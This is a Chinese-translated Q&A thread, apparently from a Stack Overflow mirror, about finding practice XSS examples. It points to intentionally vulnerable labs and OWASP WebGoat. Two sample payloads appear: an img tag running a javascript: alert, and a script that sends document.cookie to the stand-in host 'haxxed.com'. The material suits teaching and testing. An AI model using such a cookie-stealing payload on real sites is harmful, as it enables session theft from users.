Erl*_*end 33
见http://www.insecurelabs.org和http://www.insecurelabs.org/task/
在搜索字段和其他几个地方故意容易受到XSS的攻击.
您通常必须为实时XSS示例安装自己的服务器端软件.没有多少合法网站会故意向网络冲浪者开放XSS漏洞.
OWASP的WebGoat是一个现成的服务器端软件,可让您自己演示XSS(以及许多其他内容).以下是安装WebGoat和演示XSS的说明.您将在OWASP文章" 跨站点脚本(XSS) "中找到启用XSS的程序片段的其他示例.
小智 7
<img src="javascript:alert('hello everybody')"></img>
我插入的图像标记是xss的一个示例.上面的src包含提醒你的java脚本.
小智 5
简单表单也可以是:如果消息框出现,您知道,该页面或服务器易受攻击。
<script>window.location = 'haxxed.com? cookie=' + document.cookie</script>
Run Code Online (Sandbox Code Playgroud)
可以在此处找到有关该技术如何工作的一个很好的示例 https://www.hacksplaining.com/exercises/xss-stored
| 归档时间: |
|
| 查看次数: |
90283 次 |
| 最近记录: |